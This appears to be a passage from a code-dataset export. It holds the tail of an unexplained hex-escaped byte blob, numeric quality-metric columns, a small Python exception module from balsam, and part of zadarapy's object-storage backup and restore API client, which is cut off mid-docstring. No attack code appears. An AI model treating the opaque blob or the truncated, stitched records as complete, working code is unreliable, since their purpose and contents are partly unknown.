ec\x21\x09\x09\x29\x69\x77\x6a\x0a\xb2\x02\xc7\xe2\x09\x85\xb4\x5a\x09\xb6\xe5\x0b\x5b\x1e\xf4\x03\x7f\xdb\xd1\x03\x7d\x0b\xd5\xa3\x5c\x7f\x32\xb3\x41\xcb\xd2\x9b\xa9\xb1\x51\x11\xc9\x81\x93\xb2\xe2\x7b\x92\x64\xd1\x42\x08\xeb\x36\x3e\x8b\xa1\x59\xc1\xe8\xc1\x0b\x60\x47\x14\xca\xda\xb6\x6e\x92\x1f\x09\x27\xd7\xc0\x60\xa3\xdc\x0b\x03\x22\xb9\xb4\x8c\xea\x7b\xd5\x09\x88\x28\x7b\xbd\x25\x09\x99\x79\xd9\x59\x9d\x18\x6d\x55\x70\xf0\xe9\x3b\xa3\x17\x2e\x3c\x3a\x32\x06\x32\x20\x8a\xa9\x05\x8f\xba\x21\x92\xa6\xd9\x1d\x1d\x6e\x38\x6e\xb2\xba\x90\xc8\x8f\x3c\xba\x25\x36\xde\x8c\xe3\x4b\xf9\xc7\x54\x47\x45\x97\x3a\x9c\x09\x30\xb3\xd3\x44\xd8\xe2\x09\x8d\xcc\x53\x94\xf4\x49\x05\x2f\xc0\x08\x1c\x0f\xbf\xdb\xd5\x0b\x8a\xad\x21\x6c\x66\x33\xf1\x9e\x33\x92\x38\x20\x5a\x24\x98\x36\x72\x46\x
70\xdf\xa5\xdb\x46\x95\xac\x68\xbb\x96\x9e\xcf\x51\xe8\xc9\x03\x96\x6a\x72\xfc\x1f\xec\x21\xc8\xd1\x22\x67\x76\x3b\x4e\xa6\x35\x8f\xb3\x6a\x8a\xaf\xb1\xaa\x89\x91\x21\x4a\x3c\xdf\x02\x0c\xbf\x0c\xe8\x39\x93\xfd\x05\x57\xee\xf1\x5c\x9f\xbb\xe5\xaf\xca\x36\xe6\x90\x39\x74\xed\xab\xcb\x49\xa1\x58\x1e\x8e\x21\x9e\xf9\x8d\xd8\x6e\x66\x67\x64\x04\x1d\x0d\x2a\x8a\x62\x43\x2c\x4e\xe8\xc6\x7d\x1e\x51\xbd\x3d\x57\x40\xb8\x60\x60\xf5\x0a\x3c\xe2\x3e\xdf\x73\xbc\x2a\x7e\x0a\x30\xad\x82\xb3\x0e\x51\x55\x09\x9a\x56\x4a\xd0\x1a\xcf\x0c\xab\x53\x8c\xb8\x6a\x2b\x1d\xb6\x0f\x1d\x6a\x88\x9c\x26\x6d\xf0\x2a\x1c\xa2\x3d\x76\xd0\xd8\x35\x1d\xaa\xbb\x7e\x75\xec\x02\xf6\x21\xa6\x87\xb0\xc7\x2f\x0f\xa7\xc6\xd4\x39\xeb\x41\x9e\xe2\x97\x2b\x22\x3a\x30\x47\x5e\xd8\x6c\x39\x8f\x0f\x47\x03\x5a\x1f\x3b\x47\xad\x05\x18\x97\xb6\x94\x75\x7c\x5a\x35\xac\x5e\x4f\xea\x13\x68\x34\x2d\x1a\x6d\x07\x99\x35\x22\xc3\xe4\x24\x96\x82\x1f\x1e\x7b\x50\x64\x82\x13\x2c\xa7\xba\xb2\x29\x08\x8c\x8f\x15\x72\x17\x28\x1f\xfb\x52\x5d\x87\xaa', 2)
| 11,007
| 11,007
| 0.749977
| 2,747
| 11,007
| 3.000728
| 0.095013
| 0.01383
| 0.014194
| 0.011646
| 0.004731
| 0.002912
| 0.002912
| 0
| 0
| 0
| 0
| 0.315158
| 0.000273
| 11,007
| 1
| 11,007
| 11,007
| 0.433933
| 0
| 0
| 0
| 0
| 1
| 0.996366
| 0.996366
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
674866089ba3f98932590afa9c2af0e8b44255d5
| 201
|
py
|
Python
|
balsam/launcher/exceptions.py
|
Larofeticus/balsam
|
6d646ebe87a21bca5934bbd0b5fdc68a1baea09b
|
[
"BSD-3-Clause"
] | null | null | null |
balsam/launcher/exceptions.py
|
Larofeticus/balsam
|
6d646ebe87a21bca5934bbd0b5fdc68a1baea09b
|
[
"BSD-3-Clause"
] | null | null | null |
balsam/launcher/exceptions.py
|
Larofeticus/balsam
|
6d646ebe87a21bca5934bbd0b5fdc68a1baea09b
|
[
"BSD-3-Clause"
] | null | null | null |
class BalsamLauncherError(Exception):
    """Generic error raised by the Balsam launcher."""
    pass


class BalsamTransitionError(Exception):
    """Error raised while performing a Balsam job state transition."""
    pass


class TransitionNotFoundError(BalsamTransitionError, ValueError):
    """Raised when a requested state transition does not exist.

    Also a ValueError, so callers may catch it either way.
    """
    pass


class MPIEnsembleError(Exception):
    """Error raised from an MPI ensemble run."""
    pass
| 28.714286
| 70
| 0.860697
| 17
| 201
| 10.176471
| 0.470588
| 0.225434
| 0.208092
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074627
| 201
| 6
| 71
| 33.5
| 0.930108
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
67c716f6c92bf1ac8842ef28a1c1859d2a1fe501
| 47,584
|
py
|
Python
|
zadarapy/vpsa/remote_object_storage.py
|
Stratoscale/zadarapy
|
9df5cabf5f8f251cdda82024b363f3873e6e764d
|
[
"Apache-2.0"
] | null | null | null |
zadarapy/vpsa/remote_object_storage.py
|
Stratoscale/zadarapy
|
9df5cabf5f8f251cdda82024b363f3873e6e764d
|
[
"Apache-2.0"
] | null | null | null |
zadarapy/vpsa/remote_object_storage.py
|
Stratoscale/zadarapy
|
9df5cabf5f8f251cdda82024b363f3873e6e764d
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 Zadara Storage, Inc.
# Originally authored by Jeremy Brown - https://github.com/jwbrown77
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from zadarapy.validators import verify_snapshot_id, verify_boolean, \
verify_field, verify_start_limit, verify_policy_id, \
verify_ros_backup_job_id, verify_volume_id, verify_pool_id, \
verify_interval, verify_port, verify_ros_destination_id, \
verify_ros_restore_job_id, verify_restore_mode, verify_restore_job_mode
def get_all_ros_destinations(session, start=None, limit=None,
                             return_type=None, **kwargs):
    """
    Lists every remote object storage destination configured on the VPSA.

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object.  Required.

    :type start: int
    :param start: Offset of the first destination to display.  Optional.

    :type limit: int
    :param limit: Maximum number of destinations to return.  Optional.

    :type return_type: str
    :param return_type: Pass the string 'json' to receive a JSON string;
        otherwise a Python dictionary is returned (the default).  Optional.

    :rtype: dict, str
    :returns: A dictionary or JSON string depending on return_type.
    """
    return session.get_api(path='/api/object_storage_destinations.json',
                           parameters=verify_start_limit(start, limit),
                           return_type=return_type, **kwargs)
def get_ros_destination(session, ros_destination_id, return_type=None,
                        **kwargs):
    """
    Fetches a single remote object storage destination.

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object.  Required.

    :type ros_destination_id: str
    :param ros_destination_id: The destination 'name' value as returned by
        get_all_ros_destinations, e.g. 'obsdst-00000001'.  Required.

    :type return_type: str
    :param return_type: Pass the string 'json' to receive a JSON string;
        otherwise a Python dictionary is returned (the default).  Optional.

    :rtype: dict, str
    :returns: A dictionary or JSON string depending on return_type.
    """
    verify_ros_destination_id(ros_destination_id)
    endpoint = '/api/object_storage_destinations/{0}.json'.format(
        ros_destination_id)
    return session.get_api(path=endpoint, return_type=return_type, **kwargs)
def create_ros_destination(session, display_name, bucket, endpoint, username,
                           password, public, use_proxy, ros_type,
                           allow_lifecycle_policies=None, proxy_host=None,
                           proxy_port=None, proxy_username=None,
                           proxy_password=None, return_type=None, **kwargs):
    """
    Creates a remote object storage destination.  The VPSA can either connect
    directly to the object storage endpoint, or through an HTTP/HTTPS proxy
    server.

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object.  Required.

    :type display_name: str
    :param display_name: A text label to assign to the remote object storage
        destination.  For example: 'zadarabackup-bucket in AWS East'.  May
        not contain a single quote (') character.  Required.

    :type bucket: str
    :param bucket: The globally unique destination bucket identifier.  For
        example: 'zadarabackup-bucket'.  May not contain a single quote (')
        character.  Required.

    :type endpoint: str
    :param endpoint: The hostname for the object storage endpoint.  For
        example, for S3 US East: 's3.amazonaws.com'.  Required.

    :type username: str
    :param username: The username or access key ID for the object storage
        endpoint.  Required.

    :type password: str
    :param password: The password or secret access key for the object storage
        endpoint.  Required.

    :type public: str
    :param public: If set to 'YES', establishing the remote object storage
        destination and all future remote object storage jobs occur over the
        VPSA's public IP/interface (the VPSA must have a valid public IP and
        setup).  If 'NO', the relationship and remote object storage jobs
        will occur using the same IP as connecting to the storage - in this
        case the VPSA must be able to route to the remote object storage
        destination in question via the VPSA's defined default gateway.
        Required.

    :type use_proxy: str
    :param use_proxy: If set to 'YES', the VPSA will connect via an
        HTTP/HTTPS proxy when addressing the object storage destination.  If
        'NO', a direct connection will be used.  Required.

    :type ros_type: str
    :param ros_type: The type of the object storage destination as expected
        by the API's 'type' field.  Required.

    :type allow_lifecycle_policies: str
    :param allow_lifecycle_policies: If set to 'YES', the VPSA will allow
        the bucket to have lifecycle policies (valid only for AWS).
        Optional.

    :type proxy_host: str
    :param proxy_host: When use_proxy is set to 'YES', this defines the DNS
        hostname or IP of the HTTP/HTTPS proxy server to use.  Optional.

    :type proxy_port: str
    :param proxy_port: When use_proxy is set to 'YES', this defines the port
        number of the HTTP/HTTPS proxy server to use.  Optional.

    :type proxy_username: str
    :param proxy_username: When use_proxy is set to 'YES', this defines the
        proxy server username if proxy authentication is required.  Optional.

    :type proxy_password: str
    :param proxy_password: When use_proxy is set to 'YES', this defines the
        proxy server password if proxy authentication is required.  Optional.

    :type return_type: str
    :param return_type: If this is set to the string 'json', this function
        will return a JSON string.  Otherwise, it will return a Python
        dictionary.  Optional (will return a Python dictionary by default).

    :rtype: dict, str
    :returns: A dictionary or JSON data set as a string depending on
        return_type parameter.
    """
    display_name = verify_field(display_name, "display_name")
    bucket = verify_field(bucket, "bucket")
    username = verify_field(username, "username")
    password = verify_field(password, "password")
    public = verify_boolean(public, "public")
    use_proxy = verify_boolean(use_proxy, "use_proxy")
    # NOTE(review): verify_boolean is invoked even when
    # allow_lifecycle_policies is None (its default) — confirm the validator
    # tolerates None rather than raising.
    allow_lifecycle_policies = verify_boolean(allow_lifecycle_policies,
                                              "allow_lifecycle_policies")

    # NOTE(review): update_ros_destination maps non-public connections to
    # 'fe' while this function sends 'be' — confirm which value the API
    # actually expects; left unchanged here to preserve behavior.
    body_values = {'name': display_name, 'bucket': bucket,
                   'endpoint': endpoint, 'username': username,
                   'type': ros_type, 'password': password,
                   'connectVia': 'public' if public == 'YES' else 'be',
                   'allow_lifecycle_policies': allow_lifecycle_policies}

    if use_proxy == 'YES':
        body_values['proxyhost'] = proxy_host
        body_values['proxyport'] = verify_port(proxy_port)

    if proxy_username is not None:
        body_values['proxyuser'] = verify_field(proxy_username,
                                                "proxy_username")

    if proxy_password is not None:
        body_values['proxypassword'] = verify_field(proxy_password,
                                                    "proxy_password")

    path = '/api/object_storage_destinations.json'

    return session.post_api(path=path, body=body_values,
                            return_type=return_type, **kwargs)
def update_ros_destination(session, ros_destination_id, bucket=None,
                           endpoint=None, username=None, password=None,
                           public=None, use_proxy=None, proxy_host=None,
                           proxy_port=None, proxy_username=None,
                           proxy_password=None, return_type=None, **kwargs):
    """
    Updates options for an existing remote object storage destination.
    Parameters set to 'None' will not have their existing values changed.

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object.  Required.

    :type ros_destination_id: str
    :param ros_destination_id: The remote object storage destination 'name'
        value as returned by get_all_ros_destinations.  For example:
        'obsdst-00000001'.  Required.

    :type bucket: str
    :param bucket: See documentation for create_ros_destination.  Optional.

    :type endpoint: str
    :param endpoint: See documentation for create_ros_destination.  Optional.

    :type username: str
    :param username: See documentation for create_ros_destination.  Optional.

    :type password: str
    :param password: See documentation for create_ros_destination.  Optional.

    :type public: str
    :param public: See documentation for create_ros_destination.  Optional.

    :type use_proxy: str
    :param use_proxy: See documentation for create_ros_destination.  Optional.

    :type proxy_host: str
    :param proxy_host: See documentation for create_ros_destination.
        Optional.

    :type proxy_port: str
    :param proxy_port: See documentation for create_ros_destination.
        Optional.

    :type proxy_username: str
    :param proxy_username: See documentation for create_ros_destination.
        Optional.

    :type proxy_password: str
    :param proxy_password: See documentation for create_ros_destination.
        Optional.

    :type return_type: str
    :param return_type: If this is set to the string 'json', this function
        will return a JSON string.  Otherwise, it will return a Python
        dictionary.  Optional (will return a Python dictionary by default).

    :rtype: dict, str
    :returns: A dictionary or JSON data set as a string depending on
        return_type parameter.

    :raises ValueError: If no updatable parameter was supplied.
    """
    verify_ros_destination_id(ros_destination_id)

    body_values = {}

    if bucket is not None:
        body_values['bucket'] = verify_field(bucket, "bucket")

    if endpoint is not None:
        body_values['endpoint'] = endpoint

    if username is not None:
        body_values['username'] = verify_field(username, "username")

    if password is not None:
        body_values['password'] = verify_field(password, "password")

    if public is not None:
        public = verify_boolean(public, "public")
        # NOTE(review): create_ros_destination maps non-public connections
        # to 'be' while this function sends 'fe' — confirm which value the
        # API expects; left unchanged here to preserve behavior.
        body_values['connectVia'] = 'public' if public == 'YES' else 'fe'

    if use_proxy is not None:
        use_proxy = verify_boolean(use_proxy, "use_proxy")
        body_values['use_proxy'] = str(use_proxy == 'YES').lower()

    # When the proxy is being enabled, the proxy host/port keys are always
    # sent, even if their values were not supplied.
    if proxy_host is not None or use_proxy == 'YES':
        body_values['proxyhost'] = proxy_host

    if proxy_port is not None or use_proxy == 'YES':
        body_values['proxyport'] = verify_port(proxy_port)

    if proxy_username is not None:
        body_values['proxyuser'] = verify_field(proxy_username,
                                                "proxy_username")

    if proxy_password is not None:
        body_values['proxypassword'] = verify_field(proxy_password,
                                                    "proxy_password")

    if not body_values:
        raise ValueError('At least one of the following must be set: '
                         '"bucket", "endpoint", "username", "password", '
                         '"public", "use_proxy", "proxy_host", "proxy_port", '
                         '"proxy_username", "proxy_password"')

    path = '/api/object_storage_destinations/{0}.json' \
        .format(ros_destination_id)

    return session.put_api(path=path, body=body_values,
                           return_type=return_type, **kwargs)
def remove_ros_destination(session, ros_destination_id, return_type=None,
                           **kwargs):
    """
    Deletes a remote object storage destination.  The destination must have
    no remote object storage backup jobs associated with it.

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object.  Required.

    :type ros_destination_id: str
    :param ros_destination_id: The destination 'name' value as returned by
        get_all_ros_destinations, e.g. 'obsdst-00000001'.  Required.

    :type return_type: str
    :param return_type: Pass the string 'json' to receive a JSON string;
        otherwise a Python dictionary is returned (the default).  Optional.

    :rtype: dict, str
    :returns: A dictionary or JSON string depending on return_type.
    """
    verify_ros_destination_id(ros_destination_id)
    target = '/api/object_storage_destinations/{0}.json'.format(
        ros_destination_id)
    return session.delete_api(path=target, return_type=return_type, **kwargs)
def get_all_ros_destination_backup_jobs(session, ros_destination_id,
                                        start=None, limit=None,
                                        return_type=None, **kwargs):
    """
    Lists all remote object storage backup jobs for a specific remote object
    storage destination.

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object.  Required.

    :type ros_destination_id: str
    :param ros_destination_id: The destination 'name' value as returned by
        get_all_ros_destinations, e.g. 'obsdst-00000001'.  Required.

    :type start: int
    :param start: Offset of the first backup job to display.  Optional.

    :type limit: int
    :param limit: Maximum number of backup jobs to return.  Optional.

    :type return_type: str
    :param return_type: Pass the string 'json' to receive a JSON string;
        otherwise a Python dictionary is returned (the default).  Optional.

    :rtype: dict, str
    :returns: A dictionary or JSON string depending on return_type.
    """
    verify_ros_destination_id(ros_destination_id)
    query = verify_start_limit(start, limit)
    target = '/api/object_storage_destinations/{0}/backup_jobs.json'.format(
        ros_destination_id)
    return session.get_api(path=target, parameters=query,
                           return_type=return_type, **kwargs)
def get_all_ros_destination_restore_jobs(session, ros_destination_id,
                                         start=None, limit=None,
                                         return_type=None, **kwargs):
    """
    Retrieves details for all remote object storage restore jobs for the
    specified remote object storage destination.

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object.  Required.

    :type ros_destination_id: str
    :param ros_destination_id: The remote object storage destination 'name'
        value as returned by get_all_ros_destinations.  For example:
        'obsdst-00000001'.  Required.

    :type start: int
    :param start: The offset to start displaying remote object storage
        restore jobs from.  Optional.

    :type limit: int
    :param limit: The maximum number of remote object storage restore jobs
        to return.  Optional.

    :type return_type: str
    :param return_type: If this is set to the string 'json', this function
        will return a JSON string.  Otherwise, it will return a Python
        dictionary.  Optional (will return a Python dictionary by default).

    :rtype: dict, str
    :returns: A dictionary or JSON data set as a string depending on
        return_type parameter.
    """
    # Validate the destination id up front, consistent with
    # get_all_ros_destination_backup_jobs (this check was missing here).
    verify_ros_destination_id(ros_destination_id)

    path = '/api/object_storage_destinations/{0}/restore_jobs.json' \
        .format(ros_destination_id)

    parameters = verify_start_limit(start, limit)

    return session.get_api(path=path, parameters=parameters,
                           return_type=return_type, **kwargs)
def get_all_ros_backup_jobs(session, start=None, limit=None,
                            return_type=None, **kwargs):
    """
    Lists every remote object storage backup job configured on the VPSA.

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object.  Required.

    :type start: int
    :param start: Offset of the first backup job to display.  Optional.

    :type limit: int
    :param limit: Maximum number of backup jobs to return.  Optional.

    :type return_type: str
    :param return_type: Pass the string 'json' to receive a JSON string;
        otherwise a Python dictionary is returned (the default).  Optional.

    :rtype: dict, str
    :returns: A dictionary or JSON string depending on return_type.
    """
    return session.get_api(path='/api/object_storage_backup_jobs.json',
                           parameters=verify_start_limit(start, limit),
                           return_type=return_type, **kwargs)
def get_ros_backup_job(session, ros_backup_job_id, return_type=None, **kwargs):
    """
    Fetches a single remote object storage backup job.

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object.  Required.

    :type ros_backup_job_id: str
    :param ros_backup_job_id: The backup job 'name' value as returned by
        get_all_ros_backup_jobs, e.g. 'bkpjobs-00000001'.  Required.

    :type return_type: str
    :param return_type: Pass the string 'json' to receive a JSON string;
        otherwise a Python dictionary is returned (the default).  Optional.

    :rtype: dict, str
    :returns: A dictionary or JSON string depending on return_type.
    """
    verify_ros_backup_job_id(ros_backup_job_id)
    target = '/api/object_storage_backup_jobs/{0}.json'.format(
        ros_backup_job_id)
    return session.get_api(path=target, return_type=return_type, **kwargs)
def create_ros_backup_job(session, display_name, ros_destination_id, sse,
                          volume_id, policy_id, compression='YES',
                          return_type=None, **kwargs):
    """
    Creates a new remote object storage backup job.  Backups are taken from
    the snapshots produced by the specified snapshot policy.

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object.  Required.

    :type display_name: str
    :param display_name: A text label for the backup job, e.g.
        'Daily S3 Backup'.  May not contain a single quote (') character.
        Required.

    :type ros_destination_id: str
    :param ros_destination_id: The destination 'name' value as returned by
        get_all_ros_destinations, e.g. 'obsdst-00000001'.  Required.

    :type sse: str
    :param sse: The remote object storage destination SSE setting: 'NO',
        'AES256', 'KMS', or 'KMSKEYID'.  Required.

    :type volume_id: str
    :param volume_id: The 'name' of the volume to back up, as returned by
        get_all_volumes, e.g. 'volume-00000001'.  Required.

    :type policy_id: str
    :param policy_id: The snapshot policy 'name' as returned by
        get_all_snapshot_policies, e.g. 'policy-00000001'.  Determines the
        frequency and retention of backups for this job.  Required.

    :type compression: str
    :param compression: 'YES' (default) to compress backup data in flight,
        'NO' to send it uncompressed.  Optional.

    :type return_type: str
    :param return_type: Pass the string 'json' to receive a JSON string;
        otherwise a Python dictionary is returned (the default).  Optional.

    :rtype: dict, str
    :returns: A dictionary or JSON string depending on return_type.
    """
    label = verify_field(display_name, "display_name")
    verify_ros_destination_id(ros_destination_id)
    verify_volume_id(volume_id)
    verify_policy_id(policy_id)

    body = {
        'name': label,
        'destination': ros_destination_id,
        'volume': volume_id,
        'policy': policy_id,
        'sse': sse,
        'compression': verify_boolean(compression, "compression"),
    }

    return session.post_api(path='/api/object_storage_backup_jobs.json',
                            body=body, return_type=return_type, **kwargs)
def pause_ros_backup_job(session, ros_backup_job_id, return_type=None,
                         **kwargs):
    """
    Pauses a remote object storage backup job.

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object.  Required.

    :type ros_backup_job_id: str
    :param ros_backup_job_id: The remote object storage backup job 'name'
        value as returned by get_all_ros_backup_jobs.  For example:
        'bkpjobs-00000001'.  Required.

    :type return_type: str
    :param return_type: If this is set to the string 'json', this function
        will return a JSON string.  Otherwise, it will return a Python
        dictionary.  Optional (will return a Python dictionary by default).

    :rtype: dict, str
    :returns: A dictionary or JSON data set as a string depending on
        return_type parameter.
    """
    # Bug fix: this previously validated the backup job id with
    # verify_ros_destination_id; use the backup-job validator, consistent
    # with resume_ros_backup_job and break_ros_backup_job.
    verify_ros_backup_job_id(ros_backup_job_id)

    path = '/api/object_storage_backup_jobs/{0}/pause.json' \
        .format(ros_backup_job_id)

    return session.post_api(path=path, return_type=return_type, **kwargs)
def resume_ros_backup_job(session, ros_backup_job_id, return_type=None,
                          **kwargs):
    """
    Resumes a previously paused remote object storage backup job.

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object.  Required.

    :type ros_backup_job_id: str
    :param ros_backup_job_id: The backup job 'name' value as returned by
        get_all_ros_backup_jobs, e.g. 'bkpjobs-00000001'.  Required.

    :type return_type: str
    :param return_type: Pass the string 'json' to receive a JSON string;
        otherwise a Python dictionary is returned (the default).  Optional.

    :rtype: dict, str
    :returns: A dictionary or JSON string depending on return_type.
    """
    verify_ros_backup_job_id(ros_backup_job_id)
    target = '/api/object_storage_backup_jobs/{0}/continue.json'.format(
        ros_backup_job_id)
    return session.post_api(path=target, return_type=return_type, **kwargs)
def break_ros_backup_job(session, ros_backup_job_id, purge_data,
                         delete_snapshots, return_type=None, **kwargs):
    """
    Breaks a remote object storage backup job.  This action is irreversible.

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object.  Required.

    :type ros_backup_job_id: str
    :param ros_backup_job_id: The backup job 'name' value as returned by
        get_all_ros_backup_jobs, e.g. 'bkpjobs-00000001'.  Required.

    :type purge_data: str
    :param purge_data: 'YES' to delete all data related to this backup job
        on the remote object storage destination endpoint, 'NO' to leave the
        data on the endpoint.  Required.

    :type delete_snapshots: str
    :param delete_snapshots: 'YES' to delete all snapshots created by the
        associated policy, 'NO' to keep them.  Required.

    :type return_type: str
    :param return_type: Pass the string 'json' to receive a JSON string;
        otherwise a Python dictionary is returned (the default).  Optional.

    :rtype: dict, str
    :returns: A dictionary or JSON string depending on return_type.
    """
    verify_ros_backup_job_id(ros_backup_job_id)

    body = {
        'purge_data': verify_boolean(purge_data, "purge_data"),
        "delete_snapshots": verify_boolean(delete_snapshots,
                                           "delete_snapshots"),
    }
    target = '/api/object_storage_backup_jobs/{0}/break.json'.format(
        ros_backup_job_id)

    return session.post_api(path=target, body=body,
                            return_type=return_type, **kwargs)
def update_ros_backup_job_compression(session, ros_backup_job_id, compression,
                                      return_type=None, **kwargs):
    """
    Changes the in-flight compression setting of a remote object storage
    backup job.

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object.  Required.

    :type ros_backup_job_id: str
    :param ros_backup_job_id: The backup job 'name' value as returned by
        get_all_ros_backup_jobs, e.g. 'bkpjobs-00000001'.  Required.

    :type compression: str
    :param compression: 'YES' to compress backup data in flight, 'NO' to
        send it uncompressed.  Required.

    :type return_type: str
    :param return_type: Pass the string 'json' to receive a JSON string;
        otherwise a Python dictionary is returned (the default).  Optional.

    :rtype: dict, str
    :returns: A dictionary or JSON string depending on return_type.
    """
    verify_ros_backup_job_id(ros_backup_job_id)
    target = '/api/object_storage_backup_jobs/{0}/compression.json'.format(
        ros_backup_job_id)
    return session.post_api(
        path=target,
        body={'compression': verify_boolean(compression, 'compression')},
        return_type=return_type, **kwargs)
def replace_ros_backup_job_snapshot_policy(session, ros_backup_job_id,
                                           policy_id, return_type=None,
                                           **kwargs):
    """
    Swaps the snapshot policy driving a remote object storage backup job for
    the specified policy.

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object.  Required.

    :type ros_backup_job_id: str
    :param ros_backup_job_id: The backup job 'name' value as returned by
        get_all_ros_backup_jobs, e.g. 'bkpjobs-00000001'.  Required.

    :type policy_id: str
    :param policy_id: The snapshot policy 'name' as returned by
        get_all_snapshot_policies, e.g. 'policy-00000001'.  Determines the
        frequency and retention of backups for this job.  Required.

    :type return_type: str
    :param return_type: Pass the string 'json' to receive a JSON string;
        otherwise a Python dictionary is returned (the default).  Optional.

    :rtype: dict, str
    :returns: A dictionary or JSON string depending on return_type.
    """
    verify_ros_backup_job_id(ros_backup_job_id)
    verify_policy_id(policy_id)

    target = ('/api/object_storage_backup_jobs/{0}'
              '/replace_snapshot_policy.json').format(ros_backup_job_id)

    return session.post_api(path=target, body={'policyname': policy_id},
                            return_type=return_type, **kwargs)
def get_all_ros_restore_jobs(session, start=None, limit=None,
                             return_type=None, **kwargs):
    """
    Lists every remote object storage restore job running on the VPSA.

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object.  Required.

    :type start: int
    :param start: Offset of the first restore job to display.  Optional.

    :type limit: int
    :param limit: Maximum number of restore jobs to return.  Optional.

    :type return_type: str
    :param return_type: Pass the string 'json' to receive a JSON string;
        otherwise a Python dictionary is returned (the default).  Optional.

    :rtype: dict, str
    :returns: A dictionary or JSON string depending on return_type.
    """
    return session.get_api(path='/api/object_storage_restore_jobs.json',
                           parameters=verify_start_limit(start, limit),
                           return_type=return_type, **kwargs)
def get_ros_restore_job(session, ros_restore_job_id, return_type=None,
                        **kwargs):
    """
    Fetches a single remote object storage restore job.

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object.  Required.

    :type ros_restore_job_id: str
    :param ros_restore_job_id: The restore job 'name' value as returned by
        get_all_ros_restore_jobs, e.g. 'rstjobs-00000001'.  Required.

    :type return_type: str
    :param return_type: Pass the string 'json' to receive a JSON string;
        otherwise a Python dictionary is returned (the default).  Optional.

    :rtype: dict, str
    :returns: A dictionary or JSON string depending on return_type.
    """
    verify_ros_restore_job_id(ros_restore_job_id)
    target = '/api/object_storage_restore_jobs/{0}.json'.format(
        ros_restore_job_id)
    return session.get_api(path=target, return_type=return_type, **kwargs)
def create_ros_restore_job(session, display_name, ros_destination_id, pool_id,
                           restore_mode, volume_name, local_snapshot_id,
                           object_store_key, crypt, dedupe='NO', compress='NO',
                           return_type=None, **kwargs):
    """
    Creates a new remote object storage restore job.  A volume is created on
    the specified pool from a snapshot stored on the remote object storage
    destination.  (The previous docstring said "backup job" — a copy-paste
    from create_ros_backup_job.)

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object.  Required.

    :type display_name: str
    :param display_name: A text label to assign to the remote object storage
        restore job.  For example: 'PDF archive restore'.  May not contain a
        single quote (') character.  Required.

    :type ros_destination_id: str
    :param ros_destination_id: The remote object storage destination 'name'
        value as returned by get_all_ros_destinations for the destination
        where the snapshot is stored.  For example: 'obsdst-00000001'.
        Required.

    :type pool_id: str
    :param pool_id: The pool 'name' value as returned by get_all_pools where
        the snapshot will be restored.  For example: 'pool-00000001'.  The
        volume will be created on this pool.  Required.

    :type restore_mode: str
    :param restore_mode: This parameter expects one of three values:
        'restore', 'clone', or 'import_seed'.  When set to 'restore', the
        volume can be immediately attached to servers; data is retrieved
        from object storage on demand and in a background process; and all
        data will eventually be restored.  When set to 'clone', the volume
        can be immediately attached to servers; and starting with zero
        capacity, data is retrieved from object storage only on-demand when
        accessed by the attached servers.  When set to 'import_seed', a full
        capacity clone is created, including snapshot time-stamping; the
        volume can be attached to servers only after the volume's data was
        fully retrieved from object storage; use this mode to import initial
        data seed for remote mirroring.  Required.

    :type volume_name: str
    :param volume_name: A text label to assign to the restored volume.  For
        example: 'pdf-files'.  May not contain a single quote (') character.
        Required.

    :type local_snapshot_id: str
    :param local_snapshot_id: Either this or object_store_key is required.
        If using local_snapshot_id, the desired snapshot 'name' is passed as
        returned by get_all_snapshots (with the ros_backup_job_id
        specified).  For example: 'snap-00000001'.  Optional.

    :type object_store_key: str
    :param object_store_key: Either this or local_snapshot_id is required.
        If using object_store_key, this is the full object storage key for
        the "path" to the individual snapshot to be restored.  For example:
        "cloud1.C97E9A00ADE7489BB08A9AB3B0B6484F/myvpsa.vsa-00000169/
        myvol.volume-00000011/2015-07-01T09:26:01+0000_snap-0000003e/".
        This is useful when there is no local_snapshot_id to reference; for
        example, if the snapshot is being restored to a different VPSA than
        the original source.  Optional.

    :type crypt: str
    :param crypt: If set to 'YES', the resulting volume of the restoration
        will be encrypted with the VPSA's encryption key.  If 'NO', the
